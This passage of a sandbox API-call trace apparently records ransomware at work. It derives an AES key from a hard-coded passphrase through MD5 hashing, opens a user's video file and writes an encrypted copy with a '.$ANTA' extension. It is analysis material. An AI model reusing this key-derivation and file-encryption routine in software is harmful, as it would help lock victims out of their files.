| out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0102.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0102.726] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0102.726] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0102.726] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.727] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0102.727] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.727] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0102.727] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0102.727] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0102.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cabf8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0102.727] CryptHashData (hHash=0x41ac000, pbData=0x17e2c08, dwDataLen=0x22, dwFlags=0x1) returned 1 [0102.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.728] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0102.728] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac000, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac280) returned 1 [0102.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0102.728] CryptDestroyHash (hHash=0x41ac000) returned 1 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0102.778] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0102.778] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0102.778] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0102.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0102.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0102.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0102.778] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\yxs3r3.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0102.779] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.779] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.779] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0102.779] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0102.780] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0102.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0102.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0102.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0102.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0102.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0102.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da4c0 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0102.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0102.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da4c0 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0102.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0102.781] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0102.782] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\yxs3r3.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0102.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0102.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0102.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0102.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0102.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.782] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0102.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0102.783] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0102.783] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0102.783] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0102.786] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0102.786] ReadFile (in: hFile=0x298, 